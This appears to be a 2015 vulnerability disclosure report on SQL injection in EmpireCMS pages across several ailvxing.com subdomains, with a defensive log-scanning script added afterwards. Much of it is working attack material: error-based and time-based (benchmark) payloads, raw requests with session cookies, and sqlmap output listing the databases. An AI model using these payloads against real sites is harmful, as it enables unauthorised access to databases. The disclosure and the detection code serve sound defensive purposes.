2015-10-23: Details reported to the vendor, awaiting vendor response
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and domain experts
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public

As in the title.

1. Site gti.ailvxing.com, parameter askid
GET /e/ask/getInfo.php?enews=getreply&askid= HTTP/1.1
Referer: http://gti.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: gti.ailvxing.com
Cookie: dicvacst34=EmpireCMS_stats; dicvacst35=EmpireCMS_stats; dicvacst31=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst54=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvalastsearchtime=1445404741; dicvamybuycar=%7C36%2C196%7C%7C1%21%7C86%2C6%7C%7C1%21%7C32%2C271%7C%7C1%21%7C110%2C440%7C%7C1%21; dicvareturnurl=http%3A%2F%2Fgti.ailvxing.com%2Fe%2Fmember%2Flogin%2F; PHPSESSID=olt6q5223euuecur6udl37h820
Accept-Encoding: gzip, deflate

---
Place: GET
Parameter: askid
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
    Payload: enews=getreply&askid=-2174 OR (SELECT 7745 FROM(SELECT COUNT(*),CONCAT(0x716c6f6371,(SELECT (CASE WHEN (7745=7745) THEN 1 ELSE 0 END)),0x7179627271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[04:05:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
[04:05:45] [INFO] fetching database names
[04:05:46] [INFO] the SQL query used returns 3 entries
[04:05:46] [INFO] resumed: information_schema
[04:05:46] [INFO] resumed: ailvxing2015
[04:05:46] [INFO] resumed: test
available databases [3]:
[*] ailvxing2015
[*] information_schema
[*] test
2. Site hanchao.ailvxing.com, two injection points. First, the askid parameter:
GET /e/ask/getInfo.php?enews=getreply&askid=' HTTP/1.1
Referer: http://hanchao.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: hanchao.ailvxing.com
Cookie: dicvacst35=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; dicvacst34=EmpireCMS_stats; dicvacst32=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst54=EmpireCMS_stats; dicvalastsearchtime=1445410355; dicvamybuycar=%7C70%2C27%7C%7C1%21%7C32%2C273%7C%7C1%21%7C82%2C557%7C%7C1%21%7C24%2C366%7C%7C1%21%7C77%2C11%7C%7C1%21; dicvareturnurl=http%3A%2F%2Fhanchao.ailvxing.com%2Fe%2Fmember%2Flogin%2F; PHPSESSID=is9f01madkpa84jt1808e0lpm7
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Wed, 21 Oct 2015 06:57:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Length: 301
Content-Type: text/html; charset=utf-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by newstime asc' at line 1<br>select id,classid,userid,replytext,diggtop,digger,newstime from ***_ecms_ask_reply where askid=' order by newstime asc
Second, the subid parameter:
GET /e/visa/index.php/?enews=showsample&subid=340%2bbenchmark(20000000%2csha1(1))%2b HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hanchao.ailvxing.com/info-36-124-0.html
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Host: hanchao.ailvxing.com
Cookie: dicvacst114=EmpireCMS_stats; dicvacst116=EmpireCMS_stats; dicvacst31=EmpireCMS_stats; dicvacst36=EmpireCMS_stats; dicvacst35=EmpireCMS_stats; dicvacst109=EmpireCMS_stats; dicvacst63=EmpireCMS_stats; dicvacst62=EmpireCMS_stats; dicvacst61=EmpireCMS_stats; dicvacst34=EmpireCMS_stats; dicvacst32=EmpireCMS_stats; dicvacst59=EmpireCMS_stats; dicvacst57=EmpireCMS_stats; dicvacst56=EmpireCMS_stats; dicvacst55=EmpireCMS_stats; dicvacst58=EmpireCMS_stats; dicvacst53=EmpireCMS_stats; dicvacst52=EmpireCMS_stats; dicvacst60=EmpireCMS_stats; dicvacst54=EmpireCMS_stats
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Wed, 21 Oct 2015 06:51:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Length: 240
Content-Type: text/html; charset=utf-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1<br>select id,text,sample from ***_ecms_visa_subdata where id=340+benchmark(20000000,sha1(1))+
3. Site qyer.ailvxing.com, parameters askid and subid
GET /e/ask/getInfo.php?enews=getreply&askid='
4. Site xianlvke.ailvxing.com, parameters askid and subid

5. Site qy.ailvxing.com
GET /e/visa/index.php/?enews=showsample&subid=5
Database: ailvxing2015 [416 tables]
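The queries leaked in the error messages above use askid and subid as numeric ids, so any request carrying a non-integer value in them is either a probe or a broken client. The following log-hunting check is an added example written for this report (it is not part of the report or of EmpireCMS); the endpoint-to-parameter map and the access-log lines are constructed assumptions modelled on the requests shown above.

```python
"""Flag access-log requests whose EmpireCMS askid/subid values are not
plain integers.  Added example, not code from the report or EmpireCMS."""
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints named in the report and the id parameter each one takes.
# Assumed map: both ids are numeric, so anything but digits is suspect.
INT_PARAMS = {
    "/e/ask/getInfo.php": {"askid"},
    "/e/visa/index.php/": {"subid"},
}
INT_RE = re.compile(r"^\d{1,10}$")
# Request field of a common-log-format line: "GET /path?query HTTP/1.1"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def check_request(target: str) -> list:
    """Return 'param=value' findings for one request target ([] if clean)."""
    parts = urlsplit(target)
    wanted = INT_PARAMS.get(parts.path)
    if not wanted:
        return []
    findings = []
    # keep_blank_values: an empty askid= (as in the report) is still a finding
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key in wanted and not INT_RE.match(value):
            findings.append(f"{key}={value!r}")  # value is already URL-decoded
    return findings


def scan_log(lines):
    """Yield (line_number, findings) for each suspicious request line."""
    for no, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            found = check_request(m.group("target"))
            if found:
                yield no, found


# Constructed access-log lines modelled on the requests in the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Oct/2015:06:51:20 +0000] "GET /e/ask/getInfo.php?enews=getreply&askid=1201 HTTP/1.1" 200 812',
    '10.0.0.5 - - [21/Oct/2015:06:57:43 +0000] "GET /e/ask/getInfo.php?enews=getreply&askid=\' HTTP/1.1" 200 301',
    '10.0.0.5 - - [21/Oct/2015:06:51:51 +0000] "GET /e/visa/index.php/?enews=showsample&subid=340%2bbenchmark(20000000%2csha1(1))%2b HTTP/1.1" 200 240',
    '10.0.0.5 - - [21/Oct/2015:06:58:02 +0000] "GET /e/visa/index.php/?enews=showsample&subid=5 HTTP/1.1" 200 2190',
]

if __name__ == "__main__":
    for no, findings in scan_log(SAMPLE_LOG):
        print(f"line {no}: non-integer id parameter: {', '.join(findings)}")
```

The same check, applied before the value reaches the query (cast to int and bind as a parameter), is the fix on the application side; the script only shows how to find the probes after the fact.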
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-10-23 09:46
Vendor reply: Will deal with it right away, thanks!
None yet.